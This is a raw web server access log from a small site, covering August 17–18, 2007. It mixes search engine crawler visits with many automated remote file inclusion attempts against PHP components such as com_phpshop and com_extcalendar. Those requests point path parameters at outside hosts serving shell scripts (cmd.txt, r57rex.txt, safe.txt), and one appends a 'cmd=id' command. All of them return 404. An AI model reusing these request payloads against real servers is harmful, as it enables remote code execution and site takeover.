87.139.7.190 - - [17/Aug/2007:15:29:25 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.0" 404 293 "-" "libwww-perl/5.53" "www.projectpr.com"
87.139.7.190 - - [17/Aug/2007:15:32:30 -0700] "GET /logs/access.log///wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.0" 404 295 "-" "libwww-perl/5.53" "www.projectpr.com"
209.47.167.141 - - [17/Aug/2007:15:32:33 -0700] "GET / HTTP/1.0" 200 10036 "-" "-" "www.projectpr.com"
87.139.7.190 - - [17/Aug/2007:15:32:56 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.froesch-immobilien.de/contenido/external/frontend/r57rex.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:15:46:35 -0700] "GET /logs/access.log HTTP/1.1" 200 424665 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
122.152.128.49 - - [17/Aug/2007:15:52:27 -0700] "GET /robots.txt HTTP/1.1" 404 256 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:16:03:28 -0700] "GET /logs/access.log HTTP/1.1" 200 425020 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:16:20:12 -0700] "GET /logs/access.log HTTP/1.1" 200 425155 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:16:37:08 -0700] "GET /logs/access.log HTTP/1.1" 200 425290 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.27.29 - - [17/Aug/2007:16:44:17 -0700] "GET /sitebuilder/?N=A HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:16:53:43 -0700] "GET /logs/access.log HTTP/1.1" 200 425673 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:17:09:56 -0700] "GET /logs/access.log HTTP/1.1" 200 425861 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:17:26:31 -0700] "GET /logs/access.log HTTP/1.1" 200 425996 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:17:43:17 -0700] "GET /logs/access.log HTTP/1.1" 200 426184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:17:59:23 -0700] "GET /logs/access.log HTTP/1.1" 200 426372 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
65.98.88.234 - - [17/Aug/2007:18:09:32 -0700] "GET /distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.191.87.217 - - [17/Aug/2007:18:14:25 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg/ygzprgr0agfeowhubw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
209.191.87.217 - - [17/Aug/2007:18:14:27 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfg/ygzprgr0agfeowhubw HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:18:16:05 -0700] "GET /logs/access.log HTTP/1.1" 200 427219 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:18:32:36 -0700] "GET /logs/access.log HTTP/1.1" 200 427354 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:18:49:04 -0700] "GET /logs/access.log HTTP/1.1" 200 427542 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:19:06:04 -0700] "GET /logs/access.log HTTP/1.1" 200 427677 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:19:22:43 -0700] "GET /logs/access.log HTTP/1.1" 200 427812 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:19:40:35 -0700] "GET /logs/access.log HTTP/1.1" 200 428000 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
80.88.171.29 - - [17/Aug/2007:19:43:17 -0700] "GET /logs/access.log/distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 336 "-" "libwww-perl/5.803" "www.projectpr.com"
80.88.171.29 - - [17/Aug/2007:19:43:17 -0700] "GET /distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.88.171.29 - - [17/Aug/2007:19:43:18 -0700] "GET /logs/distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://supercop.congruentsoft.net/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
201.47.14.121 - - [17/Aug/2007:19:44:08 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.zendurl.com/bernecmd/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:20:01:14 -0700] "GET /logs/access.log HTTP/1.1" 200 429201 "-" "Googlebot-Image/1.0" "www.projectpr.com"
62.67.245.245 - - [17/Aug/2007:20:03:35 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.grindsworld.com//administrator/components/cmd.txt?? HTTP/1.1" 404 305 "-" "libwww-perl/5.65" "www.projectpr.com"
62.67.245.245 - - [17/Aug/2007:20:05:56 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.grindsworld.com//administrator/components/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
88.84.141.193 - - [17/Aug/2007:20:09:01 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.237.43 - - [17/Aug/2007:20:09:13 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.237.43 - - [17/Aug/2007:20:10:08 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:20:20:37 -0700] "GET /logs/access.log HTTP/1.1" 200 430574 "-" "Googlebot-Image/1.0" "www.projectpr.com"
88.84.141.193 - - [17/Aug/2007:20:21:59 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
88.84.141.193 - - [17/Aug/2007:20:22:00 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.jicharterhigh.org/Faskalis/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.150.197.143 - - [17/Aug/2007:20:34:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.projectpr.com"
89.150.197.143 - - [17/Aug/2007:20:34:50 -0700] "GET /aboutus.html HTTP/1.0" 200 9447 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:20:37:37 -0700] "GET /logs/access.log HTTP/1.1" 200 431589 "-" "Googlebot-Image/1.0" "www.projectpr.com"
200.27.96.51 - - [17/Aug/2007:20:41:20 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.27.96.51 - - [17/Aug/2007:20:41:20 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.27.96.51 - - [17/Aug/2007:20:41:21 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.27.96.51 - - [17/Aug/2007:20:41:32 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.27.96.51 - - [17/Aug/2007:20:41:32 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
200.27.96.51 - - [17/Aug/2007:20:41:33 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:20:54:11 -0700] "GET /logs/access.log HTTP/1.1" 200 433176 "-" "Googlebot-Image/1.0" "www.projectpr.com"
89.150.197.143 - - [17/Aug/2007:20:54:57 -0700] "GET /services.html HTTP/1.0" 200 9306 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.projectpr.com"
82.166.181.101 - - [17/Aug/2007:21:02:57 -0700] "GET / HTTP/1.1" 200 10036 "http://www.google.net" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "projectpr.com"
87.106.19.184 - - [17/Aug/2007:21:11:09 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:21:11:58 -0700] "GET /logs/access.log HTTP/1.1" 200 433951 "-" "Googlebot-Image/1.0" "www.projectpr.com"
88.191.62.49 - - [17/Aug/2007:21:25:28 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "WannesWeb-Group Agent/Nutch-0.9 (Agent de recherche pour le moteur WannesWeb-Group; www.wannesweb-Greoup.com; agent@wannesweb-group.com)" "www.projectpr.com"
88.191.62.49 - - [17/Aug/2007:21:25:29 -0700] "GET / HTTP/1.0" 200 10036 "-" "WannesWeb-Group Agent/Nutch-0.9 (Agent de recherche pour le moteur WannesWeb-Group; www.wannesweb-Greoup.com; agent@wannesweb-group.com)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:21:28:25 -0700] "GET /logs/access.log HTTP/1.1" 200 434566 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:21:45:08 -0700] "GET /logs/access.log HTTP/1.1" 200 434754 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.19.124 - - [17/Aug/2007:21:47:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.23.167 - - [17/Aug/2007:21:47:14 -0700] "GET /services.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:22:02:12 -0700] "GET /logs/access.log HTTP/1.1" 200 435323 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:22:18:39 -0700] "GET /logs/access.log HTTP/1.1" 200 435458 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:22:35:17 -0700] "GET /logs/access.log HTTP/1.1" 200 435593 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:22:52:20 -0700] "GET /logs/access.log HTTP/1.1" 200 435781 "-" "Googlebot-Image/1.0" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:41 -0700] "GET /?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd HTTP/1.1" 200 10036 "http://us.f559.mail.yahoo.com/ym/ShowLetter?MsgId=895_0_575_1271_924_0_326_1687_1802535808_oSOYkYn4Ur6Rg9SuJfSMZylF0qCfl_ZIAhxTnM9GZ8Qb9Llw.fSfX9Ct.RmylXpnlBWlYox62_d61bxkh6EqTZ4_JsPazNTIaYanfwZIuQrotKMr2beFvQJjEe9ZnLQkhK9hyu9M6W8uY.5ZYjAIiF2LlfBUzn9NM7art.JzzxA-&Idx=0&YY=66674&y5beta=yes&y5beta=yes&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=%40B%40Bulk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:42 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:42 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:42 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:43 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:43 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:43 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:43 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
123.236.97.151 - - [17/Aug/2007:23:02:43 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg/aHtWPzUjaT90Ymhd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; digit_may2002)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:23:08:49 -0700] "GET /logs/access.log HTTP/1.1" 200 438657 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:23:25:34 -0700] "GET /logs/access.log HTTP/1.1" 200 438845 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:23:42:30 -0700] "GET /logs/access.log HTTP/1.1" 200 439033 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [17/Aug/2007:23:58:57 -0700] "GET /logs/access.log HTTP/1.1" 200 439221 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:00:15:43 -0700] "GET /logs/access.log HTTP/1.1" 200 439409 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:00:33:16 -0700] "GET /logs/access.log HTTP/1.1" 200 439597 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.23.122 - - [18/Aug/2007:00:42:13 -0700] "GET /navigation_bars/?S=A HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:00:51:25 -0700] "GET /logs/access.log HTTP/1.1" 200 439985 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:01:08:09 -0700] "GET /logs/access.log HTTP/1.1" 200 440120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.24.235 - - [18/Aug/2007:01:16:36 -0700] "GET /clipart/lines/ HTTP/1.0" 200 671 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:01:25:22 -0700] "GET /logs/access.log HTTP/1.1" 200 440502 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:27:54 -0700] "GET /?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ HTTP/1.1" 200 10036 "http://us.f539.mail.yahoo.com/ym/ShowLetter?MsgId=9625_0_40091_1266_871_0_8449_1577_3495725391_oSOYkYn4Ur6Rg9euJfSMZ2XJUpXy9M8ud7zxUFO7KUwzcb9VTm2SrdUP2b78YvRlLtTOK0q.JwK_HoUqy8.76Y5T3jA843A6jGkyQOA9jYsMsWFvV19WOVXodtKPokfQg8kaoX2uqvRspRje13tsDnMFbAB6oBqo.mVwjlnEVQ--&Idx=9&YY=16171&y5beta=yes&y5beta=yes&inc=25&order=down&sort=date&pos=0&view=a&head=b&box=%40B%40Bulk" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:27:55 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
144.212.95.44 - - [18/Aug/2007:01:27:56 -0700] "GET / HTTP/1.0" 200 10036 "-" "Links SQL (http://gossamer-threads.com/scripts/links-sql/)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:27:57 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:28:00 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:28:11 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:28:12 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:28:13 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:28:14 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
87.249.90.222 - - [18/Aug/2007:01:28:16 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFh1XWdGT1Z0aURae2hiWjhoXQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:01:43:05 -0700] "GET /logs/access.log HTTP/1.1" 200 443693 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:01:59:49 -0700] "GET /logs/access.log HTTP/1.1" 200 443881 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:02:21:48 -0700] "GET /logs/access.log HTTP/1.1" 200 444016 "-" "Googlebot-Image/1.0" "www.projectpr.com"
64.34.193.87 - - [18/Aug/2007:02:38:40 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:02:39:56 -0700] "GET /logs/access.log HTTP/1.1" 200 444366 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
64.34.193.87 - - [18/Aug/2007:02:40:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:02:58:10 -0700] "GET /logs/access.log HTTP/1.1" 200 444774 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:03:15:44 -0700] "GET /logs/access.log HTTP/1.1" 200 444909 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.25.208 - - [18/Aug/2007:03:29:38 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:03:33:37 -0700] "GET /logs/access.log HTTP/1.1" 200 445285 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:03:50:53 -0700] "GET /logs/access.log HTTP/1.1" 200 445420 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:04:08:43 -0700] "GET /logs/access.log HTTP/1.1" 200 445555 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:04:26:48 -0700] "GET /logs/access.log HTTP/1.1" 200 445743 "-" "Googlebot-Image/1.0" "www.projectpr.com"
202.146.253.4 - - [18/Aug/2007:04:34:08 -0700] "GET /logs/access.log HTTP/1.0" 200 445878 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:04:44:45 -0700] "GET /logs/access.log HTTP/1.1" 200 446087 "-" "Googlebot-Image/1.0" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:04:59:25 -0700] "GET /logs/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:04:59:30 -0700] "GET /!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 269 "-" "libwww-perl/5.48" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:05:11:44 -0700] "GET /logs/access.log HTTP/1.1" 200 446537 "-" "Googlebot-Image/1.0" "www.projectpr.com"
217.20.116.93 - - [18/Aug/2007:05:20:18 -0700] "GET /logs/access.log/!scanhttp://www.tukangbecak.com/ban.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
156.17.59.4 - - [18/Aug/2007:05:34:22 -0700] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
156.17.59.4 - - [18/Aug/2007:05:34:22 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
156.17.59.4 - - [18/Aug/2007:05:34:22 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:05:35:35 -0700] "GET /logs/access.log HTTP/1.1" 200 447620 "-" "Googlebot-Image/1.0" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:05:54:31 -0700] "GET /logs/access.log HTTP/1.1" 200 447755 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:06:13:35 -0700] "GET /logs/access.log HTTP/1.1" 200 447943 "-" "Googlebot-Image/1.0" "www.projectpr.com"
74.6.19.124 - - [18/Aug/2007:06:29:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
